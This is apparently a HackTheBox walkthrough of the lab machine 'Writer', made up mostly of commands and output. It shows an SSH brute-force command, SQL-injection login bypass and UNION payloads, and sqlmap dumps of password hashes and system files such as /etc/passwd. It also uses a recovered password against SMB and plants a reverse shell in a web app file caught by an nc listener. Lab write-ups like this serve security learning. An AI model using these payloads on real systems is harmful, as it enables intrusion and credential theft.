This post is about the Walkthrough of the hackthebox machine: Writer
Hackthebox Writer Walkthrough Link to heading
Reconnaissance Link to heading
Port/Vuln Enumeration Link to heading
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.11.101
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-10 19:46 EDT
Nmap scan report for 10.10.11.101
Host is up (0.048s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 7.82 seconds
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.11.101
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-10 19:49 EDT
Warning: 10.10.11.101 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.11.101
Host is up (0.049s latency).
All 65535 scanned ports on 10.10.11.101 are open|filtered (65483) or closed (52)
Nmap done: 1 IP address (1 host up) scanned in 46.59 seconds
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ nmap -Pn -p 22,80,139,445 -sC -sV -oN details1.txt 10.10.11.101
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-10 19:51 EDT
Nmap scan report for 10.10.11.101
Host is up (0.047s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 98:20:b9:d0:52:1f:4e:10:3a:4a:93:7e:50:bc:b8:7d (RSA)
| 256 10:04:79:7a:29:74:db:28:f9:ff:af:68:df:f1:3f:34 (ECDSA)
|_ 256 77:c4:86:9a:9f:33:4f:da:71:20:2c:e1:51:10:7e:8d (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Story Bank | Writer.HTB
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-06-10T23:51:35
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.23 seconds
Directory scan and http enumeration Link to heading
(rocky㉿kali)-[~]
└─$ nikto -h http://10.10.11.101
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.11.101
+ Target Hostname: 10.10.11.101
+ Target Port: 80
+ Start Time: 2022-06-10 20:02:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.41 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, HEAD, GET
+ OSVDB-3268: /static/: Directory indexing found.
+ 7889 requests: 0 error(s) and 5 item(s) reported on remote host
+ End Time: 2022-06-10 20:09:00 (GMT-4) (398 seconds)
==
gobuster dir -u http://10.10.11.101 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.11.101
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/10 20:01:46 Starting gobuster in directory enumeration mode
===============================================================
/contact (Status: 200) [Size: 4905]
/about (Status: 200) [Size: 3522]
/static (Status: 301) [Size: 313] [--> http://10.10.11.101/static/]
/logout (Status: 302) [Size: 208] [--> http://10.10.11.101/]
/dashboard (Status: 302) [Size: 208] [--> http://10.10.11.101/]
/administrative (Status: 200) [Size: 1443]
/server-status (Status: 403) [Size: 277]
SMB enumeration Link to heading
As we see port 139 and 445, lets enumerate more to find more on smb
enum4linux 10.10.11.101
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Jun 10 20:14:55 2022
==========================
| Target Information |
==========================
Target ........... 10.10.11.101
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
====================================================
| Enumerating Workgroup/Domain on 10.10.11.101 |
====================================================
[+] Got domain/workgroup name: WORKGROUP
============================================
| Nbtstat Information for 10.10.11.101 |
============================================
Looking up status of 10.10.11.101
WRITER <00> - B <ACTIVE> Workstation Service
WRITER <03> - B <ACTIVE> Messenger Service
WRITER <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=====================================
| Session Check on 10.10.11.101 |
=====================================
[+] Server 10.10.11.101 allows sessions using username '', password ''
===========================================
| Getting domain SID for 10.10.11.101 |
===========================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
======================================
| OS information on 10.10.11.101 |
======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.11.101 from smbclient:
[+] Got OS info for 10.10.11.101 from srvinfo:
WRITER Wk Sv PrQ Unx NT SNT writer server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
=============================
| Users on 10.10.11.101 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: kyle Name: Kyle Travis Desc:
user:[kyle] rid:[0x3e8]
=========================================
| Share Enumeration on 10.10.11.101 |
=========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
writer2_project Disk
IPC$ IPC IPC Service (writer server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
[+] Attempting to map shares on 10.10.11.101
//10.10.11.101/print$ Mapping: DENIED, Listing: N/A
//10.10.11.101/writer2_project Mapping: DENIED, Listing: N/A
//10.10.11.101/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
==============================
| Groups on 10.10.11.101 |
==============================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=======================================================================
| Users on 10.10.11.101 via RID cycling (RIDS: 500-550,1000-1050) |
=======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-1663171886-1921258872-720408159
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-1663171886-1921258872-720408159 and logon username '', password ''
S-1-5-21-1663171886-1921258872-720408159-500 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-501 WRITER\nobody (Local User)
8)
S-1-5-21-1663171886-1921258872-720408159-508 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-509 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-510 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-511 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-512 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-513 WRITER\None (Domain Group)
S-1-5-21-1663171886-1921258872-720408159-514 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-515 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-522 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-523 *unknown*\*unknown* (8)
S-1-5-21-1
S-1-5-21-1663171886-1921258872-720408159-548 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-549 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-550 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1000 WRITER\kyle (Local User)
S-1-5-21-1663171886-1921258872-720408159-1001 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1002 *unknown*\*unknown* (8)
S-1-5-
S-1-5-21-166
S-1-5-21-1663171886-1921258872-720408159-1048 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1049 *unknown*\*unknown* (8)
S-1-5-21-1663171886-1921258872-720408159-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S
S-1-5-32
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kyle (Local User)
S-1-22-1-1001 Unix User\john (Local User)
We got few usernames like “kyle,john”. Also we got few directories,however it seems that we dont have anonymous access to these smb folders. We need to get usernames and passwords to access these folders. We can park this information for now untill we get password for users. I will to get more smb enumeration though some more scan to confirm we are missing any smb folders which have anonymous access.
We got a directory name"writer2_project". However it does not have anonymous access.
smbclient \\\\10.10.11.101/writer2_project 1 ⨯
Enter WORKGROUP\rocky's password:
tree connect failed: NT_STATUS_ACCESS_DENIED
This enumeration confirms the username of “kyle” once again.
Bruteforce Link to heading
At this stage as we look for passowrd first method which comes to mind is bruteforce as we know the username. Hydra can be used if we proceed with bruteforce of username kyle. The format as follows:
hydra -l kyle -P /usr/share/wordlists/rockyou.txt ssh://10.10.11.101 -VV -f -t 60
it will take some time ( hours) finally it will give a results. So preferabble the brute force can be avoided. Refer the output of ssh login with brute force password:
ssh kyle@10.10.11.101
The authenticity of host '10.10.11.101 (10.10.11.101)' can't be established.
ED25519 key fingerprint is SHA256:EcmD06Im3Ox+/6cWwJX2eaLFPlgm/TO0Jw20KJK1XSw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.101' (ED25519) to the list of known hosts.
kyle@10.10.11.101's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)
SQL Injection Link to heading
On the main page of website shows few blog posts:
If you try to add ’ add at the end of each blog post and try to access them it gives same page without any errors.
This hints the sql injection vulnarability.
As there is a login page available(found from directory scan earlier), i have troed the basic sql injction to login to “Admin Panel”
using ‘or’ ‘=’ ‘or’ on username and password field allowed to access the dashboard for me like below:
Lets focuss back more on the dashboard which i have logged in using the basic sql login technique.
admin' or 1=1 limit 1;-- -
'or' '=' 'or'
You can try any of the above strings as username to get access. These are the basic authentication bypass strings. More can be found[ here](SQL injection | OWASP Bricks Login page #1).
The dashboard looks like below
Theory behind this Injection: Link to heading
The actual way a login query works
select * from users where username = '[username]' and password = hash('[password]');
The sql authentication bypass injection makes like this. Basically these type of queries are used if we dont know the username/password. The Same has been explained in the url above.
select * from users where username = 'admin' or 1=1 limit 1;-- -' and password = [hash];
Fuzzing method to confirm the sql injection Link to heading
in this case most common sql injection technique worked. However if you dont want to try this manual trial and error method, we can use the sql list available under the seclist and use any fuzzing tool.
How to forumate the ffuf
-X POST ( post request) -u http://10.10.11.101/administrative - ( url we want to fuzz) -d ‘uname=FUZZ&password=testpassword’ - (FUZZ word we mentioned will be replaced with the wordlist we choose) ` -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt ( wordlist) -H “Content-Type: application/x-www-form-urlencoded” - Content header format(i use this by default)
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -H "Content-Type: application/x-www-form-urlencoded" --fw 206
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1 Kali Exclusive <3
________________________________________________
:: Method : POST
:: URL : http://10.10.11.101/administrative
:: Wordlist : FUZZ: /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : uname=FUZZ&password=testpassword
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response words: 206
________________________________________________
admin' or ' [Status: 200, Size: 1296, Words: 280, Lines: 33]
hi' or 'x'='x'; [Status: 200, Size: 1296, Words: 280, Lines: 33]
x' or 1=1 or 'x'='y [Status: 200, Size: 1296, Words: 280, Lines: 33]
' or 1=1 or ''=' [Status: 200, Size: 1296, Words: 280, Lines: 33]
' or 0=0 # [Status: 200, Size: 1296, Words: 280, Lines: 33]
:: Progress: [267/267] :: Job [1/1] :: 535 req/sec :: Duration: [0:00:01] :: Errors: 0 ::
Why the additinal option –fw=206
Initially when i run the output looks messy. So we could see many work length have max 206. So we used this . Refer the outwithout using the fw option
If using proxy, you can add the proxy option as well like this
ffuf -X POST -u http://10.10.11.101/administrative -d 'uname=FUZZ&password=testpassword' -w /usr/share/SecLists-master/Fuzzing/SQLi/Generic-SQLi.txt -x http://127.0.0.1:8080 -H "Content-Type: application/x-www-form-urlencoded" --fw 206
Lets try to login with one of the results from FFUF results and i can see it works as well:
If you intercept the login with Burp, you can see the logon parameters
As mentioned earlier once we use sql injection for login the actual login query looks like this
select * from users where username = '[username]' and password = hash('[password]');
If we try union sql injection query like this,
' UNION select 1;-- -
The query will look like below
select * from users where username = '' UNION select 1;-- -' and password = hash('[password]');
The reason why we add ’ with union injection values because the form needs to be logged in. Without ’ it will never logs in and data base table wont be looked in.
I keep on adding the union injection values like ’ UNION select 1,2,3;– - No change in the response untill i add till 6.at 6 i can see a welcome2 page
This proves the database has 6 collums and 2 nd field is username where previusly it was showing as welcome admin. Now in last union iknection it started showing as welcome 2.
We can try replacing it with diffent queries so we can enumerate more details.
To find the current database
uname=' UNION select 1,database(),3,4,5,6;-- -&password=test
To Find all databases
uname=' UNION select 1,schema_name,3,4,5,6 from information_schema.schemata;-- -&password=test
To put it in more readable format we can use groupconcat function like this
UNION select 1,group_concat(schema_name),3,4,5,6 from information_schema.schemata;-- -&password=test
Enumeration using sqlmap Link to heading
The above details which we have found using the burp can be found using the sqlmap itself.
Capture a login request and save .
Same results here :
$ ls
alltcp.txt alludp.txt details1.txt login.request log.req newlogin.request
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ sqlmap -r newlogin.request
___
__H__
___ ___["]_____ ___ ___ {1.5.5#stable}
|_ -| . [)] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:55:05 /2022-06-14/
[19:55:05] [INFO] parsing HTTP request from 'newlogin.request'
[19:55:06] [INFO] resuming back-end DBMS 'mysql'
[19:55:06] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[19:55:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[19:55:06] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
[19:55:06] [WARNING] your sqlmap version is outdated
[*] ending @ 19:55:06 /2022-06-14/
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ sqlmap -r newlogin.request --dbs
___
__H__
___ ___["]_____ ___ ___ {1.5.5#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 19:55:51 /2022-06-14/
[19:55:51] [INFO] parsing HTTP request from 'newlogin.request'
[19:55:51] [INFO] resuming back-end DBMS 'mysql'
[19:55:51] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uname (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: uname=a' AND (SELECT 1249 FROM (SELECT(SLEEP(5)))fOfd) AND 'GppF'='GppF&password=b
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: uname=a' UNION ALL SELECT NULL,CONCAT(0x717a787671,0x48797868566f42657270484d6a784549534a7777644a4148436f5664527276655376504e44585947,0x7178707871),NULL,NULL,NULL,NULL-- -&password=b
---
[19:55:52] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (focal or eoan)
web application technology: Apache 2.4.41
back-end DBMS: MySQL >= 5.0.12
[19:55:52] [INFO] fetching database names
available databases [2]:
[*] information_schema
[*] writer
[19:55:52] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
[19:55:52] [WARNING] your sqlmap version is outdated
[*] ending @ 19:55:52 /2022-06-14/
Since the sqlmap also shows there are 2 databases. Lets see the tables under databases: Writer
sqlmap -r newlogin.request -D writer --tables
[19:58:33] [INFO] fetching tables for database: 'writer'
Database: writer
[3 tables]
+---------+
| site |
| stories |
| users |
+---------+
Now lets find the data on these tables.
sqlmap -r newlogin.request -D writer -T site --dump
Database: writer
Table: site
[1 entry]
+----+---------------+------------+------------------+------------+----------------------------------------------------------+
| id | logo | title | favicon | ganalytics | description |
+----+---------------+------------+------------------+------------+----------------------------------------------------------+
| 1 | /img/logo.png | Story Bank | /img/favicon.ico | <blank> | This is a site where I publish my own and others stories |
+----+---------------+------------+------------------+------------+----------------------------------------------------------+
sqlmap -r newlogin.request -D writer -T users --dump
Database: writer
Table: users
[1 entry]
+----+------------------+--------+----------------------------------+----------+--------------+
| id | email | status | password | username | date_created |
+----+------------------+--------+----------------------------------+----------+--------------+
| 1 | admin@writer.htb | Active | 118e48794631a9612484ca8b55f622d0 | admin | NULL |
+----+------------------+--------+----------------------------------+----------+--------------+
Even if it showed the hash, the hashcat and rockyou wordlist i tried is taking lot of time to crack it. So i Have skipped the step.
Remote file read with sql injection Link to heading
We can try to see the file read privileges
sqlmap -r newlogin.request --privileges
20:20:03] [INFO] fetching database users privileges
got a refresh intent (redirect like response common to login pages) to '/dashboard'. Do you want to apply it from now on? [Y/n] n
database management system users privileges:
[*] 'admin'@'localhost' [1]:
privilege: FILE
Lets try to read some system files
sqlmap -r newlogin.request --file-read=/etc/lsb-release
[20:52:45] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_lsb-release (size differs from remote file)
[20:52:45] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
This shows the file is locally downloaded and we can read this file from specificed location mentioned
The same file read can be done mnaullay using the burp request with load_file query
Lets explore more files using sqlmap:
sqlmap -r newlogin.request --file-read=/etc/passwd
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_passwd (size differs from remote file)
[21:40:44] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10
cat /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash
lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
postfix:x:113:118::/var/spool/postfix:/usr/sbin/nologin
filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh
john:x:1001:1001:,,,:/home/john:/bin/bash
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
We can note the usernames like (kyle,john)
As it’s apachae server , lets search for the default configuration file
sqlmap -r new.req --file-read=/etc/apache2/sites-enabled/000-default.conf
[21:00:43] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[21:00:43] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_etc_apache2_sites-enabled_000-default.conf (size differs from remote file)
[21:00:43] [INFO] fetched data logged to text files under '/home/rocky/.local/share/sqlmap/output/10.10.11.101'
It shows some reference for the script file /var/www/writer.htb/writer.wsgi
sqlmap -r new.req --file-read=/var/www/writer.htb/writer.wsgi
[21:20:44] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
files saved to [1]:
[*] /home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_var_www_writer.htb_writer.wsgi (size differs from remote file)
[
[*] ending @ 21:20:44 /2022-06-15/
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$
┌──(rocky㉿kali)-[~/hckbox/writer]
└─$ cat home/rocky/.local/share/sqlmap/output/10.10.11.101/files/_var_www_writer.htb_writer.wsg
In the script it mentioning about another file init.py file. I have downloaded it with sqlmap and it has some intresting parameters
Let’s try these password on smb share which we try to enumerate anonymously.This time we have list of possible set of usernames which we got from /etc/passwd and password got from this file.
The user kyle works with this password on smabshare.
└─$ smbmap -H 10.10.11.101 -u kyle -p ToughPasswordToCrack
[+] IP: 10.10.11.101:445 Name: 10.10.11.101
Disk Permissions Comment
---- ----------- -------
print$ READ ONLY Printer Drivers
writer2_project READ, WRITE
IPC$ NO ACCESS IPC Service (writer server (Samba, Ubuntu))
We can see one directory has read/write access as well.
Using smbclient we can access the files under “writer2_project”
smbclient //10.10.11.101/writer2_project -U \\kyle%ToughPasswordToCrack
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Jun 16 19:48:11 2022
.. D 0 Tue Jun 22 13:55:06 2021
static D 0 Sun May 16 16:29:16 2021
staticfiles D 0 Fri Jul 9 06:59:42 2021
writer_web D 0 Wed May 19 11:26:18 2021
requirements.txt N 15 Thu Jun 16 19:54:01 2022
writerv2 D 0 Wed May 19 08:32:41 2021
manage.py N 806 Thu Jun 16 19:54:01 2022
smb: \> cd writer_web\
smb: \writer_web\> ls
. D 0 Wed May 19 11:26:18 2021
.. D 0 Thu Jun 16 19:48:11 2022
apps.py N 133 Thu Jun 16 19:56:01 2022
views.py A 181 Thu Jun 16 19:56:01 2022
__init__.py N 0 Thu Jun 16 19:56:01 2022
urls.py N 127 Thu Jun 16 19:56:01 2022
tests.py N 60 Thu Jun 16 19:56:01 2022
__pycache__ D 0 Wed May 19 17:06:02 2021
admin.py N 63 Thu Jun 16 19:56:01 2022
models.py N 98 Thu Jun 16 19:56:01 2022
templates D 0 Tue May 18 09:43:07 2021
cat views.py
from django.shortcuts import render
from django.views.generic import TemplateView
def home_page(request):
template_name = "index.html"
return render(request,template_name)
There are few python scripts and one simple scripts seems to be for identifying the views of website visit.
I have modified the script by adding a single line python reverse shell script.
Now upload the file back to smbshare in same name
Then refresh the site and on the netcat listner we setup, we have a reverse shell.
─(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.101] 50442
/bin/sh: 0: can't access tty; job control turned off
python -c 'import pty; pty.spawn("/bin/bash")'
/bin/sh: 1: python: not found
python -c 'import pty; pty.spawn("/bin/sh")'
/bin/sh: 2: python: not found
python3 -c 'import pty; pty.spawn("/bin/bash")'
whoami
whoami
www-data
bash-5.0$
The “manage.py"file found once we login which is used to manage the website related tasks in Django. With python3 “dbshell” command we can use this file to enumerate databases.
python3 manage.py dbshell
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 4739
Server version: 10.3.29-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| dev |
| information_schema |
+--------------------+
2 rows in set (0.000 sec)
show tables;
+----------------------------+
| Tables_in_dev |
+----------------------------+
| auth_group |
| auth_group_permissions |
| auth_permission |
Reading table information for completion of table and column names
-> Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
->
< for help. Type '\c' to clear the current input statement.
| auth_user |
| auth_user_groups |
| auth_user_user_permissions |
| django_admin_log |
| django_content_type |
| django_migrations |
| django_session |
+----------------------------+
10 rows in set (0.000 sec)
select auth_user;
->
MariaDB [dev]> select auth_user;
ERROR 1054 (42S22): Unknown column 'auth_user' in 'field list'
select * from auth_user;
select * from auth_user;
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
| id | password | last_login | is_superuser | username | first_name | last_name | email | is_staff | is_active | date_joined |
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
| 1 | pbkdf2_sha256$260000$wJO3ztk0fOlcbssnS1wJPD$bbTyCB8dYWMGYlz4dSArozTY7wcZCS7DV6l5dpuXM4A= | NULL | 1 | kyle | | | kyle@writer.htb | 1 | 1 | 2021-05-19 12:41:37.168368 |
+----+------------------------------------------------------------------------------------------+------------+--------------+----------+------------+-----------+-----------------+----------+-----------+----------------------------+
1 row in set (0.000 sec)
Using the hashcat we can crack this hash and this gives us the direct ssh password for kyle.
Reverse shell as John Link to heading
Once we login we can see the basic privilege escalation steos before running privilege escalation scripts.
yle@writer:~$ id
uid=1000(kyle) gid=1000(kyle) groups=1000(kyle),997(filter),1002(smbgroup)
The User belongs to mutiple groups.
I have tried to see the files which are owned by these groups. kyle and smbgroup owns a lot of files. smbgroup owed a lot of files under /var/www/writer2_project
So i have used some filtering to see relevant results
kyle@writer:~$ find / -group smbgroup 2>/dev/null | wc -l
3915
kyle@writer:~$ find / -group filter 2>/dev/null | wc -l
2
kyle@writer:~$ find / -group kyle 2>/dev/null | wc -l
1124
kyle@writer:~$ find / -group smbgroup 2>/dev/null | grep -v '^/var/www/writer2'
kyle@writer:~$ find / -group kyle 2>/dev/null | grep -v -e '^/run' -e '^/sys' -e '^/proc'
/home/kyle
/home/kyle/user.txt
/home/kyle/.bash_logout
/home/kyle/.cache
/home/kyle/.cache/motd.legal-displayed
/home/kyle/.bashrc
/home/kyle/.profile
kyle@writer:~$ find / -group filter 2>/dev/null
/etc/postfix/disclaimer
/var/spool/filter
Postfix Link to heading
There are some files mentioning postfix. Postfix is mail server. There are 2 folders
/var/spool/filter directory is empty.
kyle@writer:~$ cd /var/spool/filter/
kyle@writer:/var/spool/filter$ ls
kyle@writer:/var/spool/filter$ cd /etc/postfix/
kyle@writer:/etc/postfix$ ls
disclaimer disclaimer.txt dynamicmaps.cf.d main.cf.proto master.cf postfix-files postfix-script sasl
disclaimer_addresses dynamicmaps.cf main.cf makedefs.out master.cf.proto postfix-files.d post-install
Lets review the configuration file to see how it sends mail.
kyle@writer:/etc/postfix$ cat master.cf | tail
flags=F user=ftn argv=/usr/lib/ifmail/ifmail -r $nexthop ($recipient)
bsmtp unix - n n - - pipe
flags=Fq. user=bsmtp argv=/usr/lib/bsmtp/bsmtp -t$nexthop -f$sender $recipient
scalemail-backend unix - n n - 2 pipe
flags=R user=scalemail argv=/usr/lib/scalemail/bin/scalemail-store ${nexthop} ${user} ${extension}
